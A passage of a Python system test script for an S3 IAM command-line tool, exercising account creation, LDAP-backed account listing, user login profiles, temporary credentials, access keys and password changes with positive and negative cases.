result.command_response_should_have("InvalidParameterValue")
# 3. Negative
test_msg = "Create account s3testwithkeys3 with only Secret key"
account_args = {
'AccountName': 's3testwithkeys3',
'Email': 's3testwithkeys3@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'secret_key': 'SSSSSSSS2'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
# 4. Negative
test_msg = "Create account s3testwithkeys4 with invalid Access key"
account_args = {
'AccountName': 's3testwithkeys4',
'Email': 's3testwithkeys4@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAA',
'secret_key': 'SSSSSSSSS12'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
# 5. Negative
test_msg = "Create account s3testwithkeys5 with invalid Secret key"
account_args = {
'AccountName': 's3testwithkeys5',
'Email': 's3testwithkeys5@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAA3',
'secret_key': 'SSSS'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
test_msg = "Create account s3test"
account_args = {'AccountName': 's3test', 'Email': 's3test@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
GlobalTestState.root_access_key = account_response_elements['AccessKeyId']
GlobalTestState.root_secret_key = account_response_elements['SecretKey']
# Create Account again with same email ID
test_msg = "Create account s3test1 should fail with EmailAlreadyExists"
account_args = {'AccountName': 's3test1', 'Email': 's3test@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "Account wasn't created."
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_should_match_pattern(account_response_pattern)
result.command_response_should_have("EmailAlreadyExists")
test_msg = "List accounts"
account_args = {'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account(**account_args).execute_test()
result.command_should_match_pattern(accounts_response_pattern)
test_msg = "List accounts - Take ldapuser and ldappasswd from config"
# Put SG_LDAP_PASSWD and SG_LDAP_USER in ~/.sgs3iamcli/config.yaml file
new_config_entries = {'SG_LDAP_PASSWD' : S3ClientConfig.ldappasswd, 'SG_LDAP_USER': S3ClientConfig.ldapuser}
update_config_yaml(new_config_entries)
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account().execute_test()
result.command_should_match_pattern(accounts_response_pattern)
restore_config_yaml()
test_msg = "List accounts - Take ldapuser and ldappasswd from env"
# Declare SG_LDAP_USER and SG_LDAP_PASSWD environment variables
os.environ['SG_LDAP_USER'] = S3ClientConfig.ldapuser
os.environ['SG_LDAP_PASSWD'] = S3ClientConfig.ldappasswd
accounts_response_pattern = "AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
result = AuthTest(test_msg).list_account().execute_test()
result.command_should_match_pattern(accounts_response_pattern)
# Remove environment variables declared above
os.environ.pop("SG_LDAP_USER")
os.environ.pop("SG_LDAP_PASSWD")
test_msg = "List accounts - Take invalid ldapuser and ldappasswd from config"
new_config_entries = {'SG_LDAP_PASSWD': 'sgiamadmin#', 'SG_LDAP_USER': 'ldapadmin#'}
update_config_yaml(new_config_entries)
result = AuthTest(test_msg).list_account().execute_test(negative_case=True)
result.command_should_match_pattern("Failed to list accounts")
restore_config_yaml()
#TODO - Need to fix this test. Currently skipping this test as it waits for password to be entered manually through prompt.
'''
test_msg = "List accounts - Take ldapuser and ldappasswd from prompt"
_use_root_credentials()
accounts_response_pattern = "Enter Ldap User Id: Enter Ldap password: AccountName = [\w-]*, AccountId = [\w-]*, CanonicalId = [\w-]*, Email = [\w.@]*"
stdin_values = S3ClientConfig.ldapuser + '\n' + S3ClientConfig.ldappasswd
S3ClientConfig.ldapuser = None
S3ClientConfig.ldappasswd = None
result = AuthTest(test_msg).list_account().execute_test(False, False, stdin_values)
result.command_should_match_pattern(accounts_response_pattern)
'''
load_test_config()
# Test create user API
# Case 1 - Path not given (take default value).
# Case 2 - Path given
def user_tests():
_use_root_credentials()
date_pattern = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1]) (2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9][\+-][0-9]*:[0-9]*"
#Below account creation is for aws iam cli system testing. First delete account if already exist and then create it newly
test_msg = "Delete account if already exist"
account_args = {}
test_msg = "Delete account aws_iam_test_account"
account_args = {'AccountName': 'aws_iam_test_account'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)
test_msg = "Create account aws_iam_test_account"
account_args = {'AccountName': 'aws_iam_test_account', 'Email': 'iam@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
#Save the details in file
f = open("aws_iam_credential_file" , "w")
f.write("[default]\n")
f.write("aws_access_key_id = ")
f.write(account_response_elements['AccessKeyId'])
f.write("\naws_secret_access_key = ")
f.write(account_response_elements['SecretKey'])
f.close()
#GetTempAuth Start
#Create account
test_msg = "Create account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "tempAuthTestAccount"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
#Create Account LoginProfile for tempAuthTestAccount"
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="tempAuthTestAccount"
user_args['Password'] = "accountpassword"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
#Get Temp Auth Credentials for account for account
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#Setting aws temporary credentials under environment variables
response_elements = get_response_elements(result.status.stdout)
os.environ["AWS_ACCESS_KEY_ID"] = response_elements['AccessKeyId']
os.environ["AWS_SECRET_ACCESS_KEY"] = response_elements['SecretAccessKey']
os.environ["AWS_SESSION_TOKEN"] = response_elements['SessionToken']
AwsTest('Aws can create bucket').create_bucket("tempcredbucket").execute_test().command_is_successful()
AwsTest('Aws can delete bucket').delete_bucket("tempcredbucket").execute_test().command_is_successful()
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
del os.environ["AWS_SESSION_TOKEN"]
#Create User
access_key_args['UserName'] = "u1"
test_msg = "Create User u1"
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**access_key_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
#Create user loginprofile
access_key_args['Password'] = "userpassword"
test_msg = 'create user login profile for u1'
user_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**access_key_args).execute_test()
#Get Temp Auth Credentials for account for user u1
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#Get Temp Auth Credentials for account with duration more than max allowed
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
access_key_args['Duration'] = "500000"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("MaxDurationIntervalExceeded")
#Get Temp Auth Credentials for account with duration less than minimum required
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
access_key_args['Duration'] = "50"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("MinDurationIntervalNotMaintained")
#Update password Reset Flag and check
#update userlogin profile
test_msg = 'update user login profile for u1'
access_key_args['PasswordResetRequired']=True
result = AuthTest(test_msg).update_login_profile(user_name_flag ,**access_key_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
#Get Temp Auth Credentials for account for passwordreset True
test_msg = 'GetTempAuthCredentials failure'
account_name_flag = "-a"
password_flag = "--password"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("PasswordResetRequired")
# UpdateAccountLoginProfile and DeleteAccount with Temp Credentials -- Start
os.environ["AWS_ACCESS_KEY_ID"] = response_elements['AccessKeyId']
os.environ["AWS_SECRET_ACCESS_KEY"] = response_elements['SecretAccessKey']
os.environ["AWS_SESSION_TOKEN"] = response_elements['SessionToken']
test_msg = 'UpdateAccountLoginProfile Successfull'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="tempAuthTestAccount"
account_args['Password'] ="newpwd1234"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
#Delete account
test_msg = "Delete account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
del os.environ["AWS_SESSION_TOKEN"]
# UpdateAccountLoginProfile and DeleteAccount with Temp Credentials -- End
#GetTempAuth End
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Update User s3user1 (new name = s3user1New, new path - /test/success)'
user_args = {}
user_args['UserName'] = "s3user1"
user_args['NewUserName'] = "s3user1New"
user_args['NewPath'] = "/test/success/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'create user login profile should fail for exceeding max allowed password length.'
user_args = {}
maxPasswordLength = "abcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijk\
abcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrddd";
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "s3user1New"
user_args['Password'] = maxPasswordLength;
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for invalid username.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "s3userinvalidname"
user_args['Password'] = "abcdef"
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for empty username.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="\"\""
user_args['Password'] = "abcdre"
result = AuthTest(test_msg).create_login_profile(user_name_flag, password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create userloginprofile.")
test_msg = 'create user login profile should fail for username missing.'
user_args = {}
user_name_flag = ""
password_flag = "--password"
user_args['UserName'] =""
user_args['Password'] = "abcdref"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("User name is required for user login-profile creation")
test_msg = 'create user login profile should fail for password missing.'
user_args = {}
user_name_flag = "-n"
password_flag = ""
user_args['UserName'] ="abcd"
user_args['Password'] = ""
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("User password is required for user login-profile creation")
test_msg = 'create user login profile should fail with username as root.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="root"
user_args['Password'] = "pqrsef"
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot create account login profile with CreateUserLoginProfile")
test_msg = 'create user login profile should succeed.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="s3user1New"
user_args['Password'] = "abcdefg"
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'create user login profile failed for user with existing login profile'
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("EntityAlreadyExists")
#********* Test create user login profile with --password-reset-required *********************
test_msg = 'Create User user01'
user_args = {'UserName': 'user01'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'create user login profile should succeed with --password-reset-required'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "user01"
user_args['Password'] = "abcdef"
user_args['PasswordResetRequired'] = "True"
login_profile_response_pattern = "Login Profile "+date_pattern+" "+user_args['PasswordResetRequired']+" "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'Delete User user01'
user_args = {}
user_args['UserName'] = "user01"
user_args['Password'] = "abcdef"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
#********* Test create user login profile with --no-password-reset-required *********************
test_msg = 'Create User user02'
user_args = {'UserName': 'user02'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'create user login profile should succeed with --no-password-reset-required'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] = "user02"
user_args['Password'] = "abcddt"
user_args['PasswordResetRequired'] = "False"
login_profile_response_pattern = "Login Profile "+date_pattern+" "+user_args['PasswordResetRequired']+" "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'Delete User user02'
user_args = {}
user_args['UserName'] = "user02"
user_args['Password'] = "abcddt"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'GetUserLoginProfile Successfull'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test()
result.command_should_match_pattern(user_profile_response_pattern)
test_msg = 'GetUserLoginProfile failed for invalid user'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="abcd"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to get Login Profile")
test_msg = 'GetUserLoginProfile should fail with username as root'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="root"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot get account login profile with GetUserLoginProfile")
test_msg = "Create User loginProfileTestUser (default path)"
user_args = {'UserName': 'loginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'GetUserLoginProfile failed for user without LoginProfile created'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="loginProfileTestUser"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("NoSuchEntity")
test_msg = 'Delete User loginProfileTestUser'
user_args = {}
user_args['UserName'] = "loginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User updateLoginProfileTestUser (default path)"
user_args = {'UserName': 'updateLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is updateLoginProfileTestUser)'
access_key_args = {}
access_key_args['UserName'] = 'updateLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'UpdateLoginProfile should fail when tried with IAM User accessKey-secretKey'
user_name_flag = "-n"
access_key_args['UserName'] ="updateLoginProfileTestUser"
access_key_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile_with_user_key(user_name_flag , **access_key_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidUser")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User UpdateLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'UpdateLoginProfile is successful'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
test_msg = 'UpdateLoginProfile fails without new password ,password-reset and no-password-reset flag entered'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Please provide password or password-reset flag")
test_msg = 'UpdateLoginProfile should fail with username as root'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="root"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot update account login profile with UpdateUserLoginProfile")
test_msg = 'UpdateLoginProfile is successful with only password-reset flag entered'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
user_args['PasswordResetRequired']=True
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("UpdateUserLoginProfile is successful")
test_msg = 'GetLoginProfile to validate password reset flag set to True'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="s3user1New"
result = AuthTest(test_msg).get_login_profile(user_name_flag , **user_args).execute_test()
result.command_response_should_have("True")
test_msg = "Create User updateLoginProfileTestUser (default path)"
user_args = {'UserName': 'updateLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'UpdateUserLoginProfile failed for user without LoginProfile created'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="updateLoginProfileTestUser"
user_args['Password'] = "newPassword"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("NoSuchEntity")
test_msg = 'Delete User updateLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'UpdateUserLoginProfile failed for username missing.'
user_args = {}
user_name_flag = ""
user_args['UserName'] =""
user_args['Password'] = "abcdefd"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("UserName is required for UpdateUserLoginProfile")
test_msg = 'UpdateLoginProfile failed as user doesnt exist in ldap'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="dummyUser"
user_args['Password'] = "password"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("UpdateUserLoginProfile failed")
test_msg = 'UpdateLoginProfile failed for invalid username'
user_args = {}
user_name_flag = "-n"
user_args['UserName'] ="dummyUser$"
user_args['Password'] = "password"
result = AuthTest(test_msg).update_login_profile(user_name_flag , **user_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidParameterValue")
#*************************Test s3iamcli ChangePassword for IAM user******************
test_msg = "Create User changePasswordUserLoginProfileTestUser "
user_args = {'UserName': 'changePasswordUserLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is changePasswordUserLoginProfileTestUser)'
access_key_args = {}
user_access_key_args = {}
access_key_args['UserName'] = 'changePasswordUserLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
user_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
user_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'create user login profile for changePasswordUserLoginProfileTestUser.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="changePasswordUserLoginProfileTestUser"
user_args['Password'] = "abcdfs"
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
test_msg = 'ChangePassword should fail with root accessKey-secretKey, user OldPassword and NewPassword.'
account_user_access_key_args = {}
account_user_access_key_args['AccessKeyId'] = S3ClientConfig.access_key_id
account_user_access_key_args['SecretAccessKey'] = S3ClientConfig.secret_key
account_user_access_key_args['OldPassword'] ="abcdfs"
account_user_access_key_args['NewPassword'] = "pqrswq"
result = AuthTest(test_msg).change_user_password(**account_user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidUserType")
test_msg = 'ChangePassword should fail with IAM user accessKey-secretKey,NewPassword and invalid oldPassword.'
test_access_key_args = {}
test_access_key_args['AccessKeyId'] = user_access_key_args['AccessKeyId']
test_access_key_args['SecretAccessKey'] = user_access_key_args['SecretAccessKey']
test_access_key_args['NewPassword'] = "pqrswq"
test_access_key_args['OldPassword'] = "pqrsqq"
result = AuthTest(test_msg).change_user_password(**test_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidPassword")
test_msg = 'ChangePassword with IAM User accessKey-secretKey, OldPassword and NewPassowrd should succeed.'
user_access_key_args['OldPassword'] ="abcdfs"
user_access_key_args['NewPassword'] = "pqrsoe"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'Two subsequent ChangePassword with valid password value should succeed - first changepassword'
user_access_key_args['OldPassword'] ="pqrsoe"
user_access_key_args['NewPassword'] = "vcxvsd"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'Two subsequent ChangePassword with valid password value should succeed - second changepassword'
user_access_key_args['OldPassword'] ="vcxvsd"
user_access_key_args['NewPassword'] = "xyzdet"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with same value for oldPassword and newPassword should fail.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "xyzdet"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidPassword")
test_msg = 'ChangePassword with empty value i.e\"\" for newPassword should fail.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "\"\""
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("Invalid length for parameter NewPassword")
test_msg = 'ChangePassword with special character i.e. pqrsdd\\t as newPassword should succeed.'
user_access_key_args['OldPassword'] ="xyzdet"
user_access_key_args['NewPassword'] = "pqrsdd\\t"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with space i.e." avcghj " as newPassword should succeed.'
user_access_key_args['OldPassword'] ="pqrsdd\\t"
user_access_key_args['NewPassword'] = " avcghj "
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = 'ChangePassword with special character e.g xvc#?*% as newPassword should succeed.'
user_access_key_args['OldPassword'] =" avcghj "
user_access_key_args['NewPassword'] = "xvc#?*%"
result = AuthTest(test_msg).change_user_password(**user_access_key_args).execute_test()
result.command_response_should_have("ChangePassword is successful")
test_msg = "Create User TestUser "
user_args = {'UserName': 'TestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is TestUser)'
access_key_args = {}
test_user_access_key_args = {}
access_key_args['UserName'] = 'TestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
test_user_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_user_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'ChangePassword should fail with another IAM user(i.e.TestUser) accessKey-secretKey, OldPassword and NewPassword.'
test_user_access_key_args['OldPassword'] ="pqrsdd"
test_user_access_key_args['NewPassword'] = "xyzadd"
result = AuthTest(test_msg).change_user_password(**account_user_access_key_args).execute_test(negative_case=True)
result.command_response_should_have("ChangePassword failed")
result.command_response_should_have("InvalidUserType")
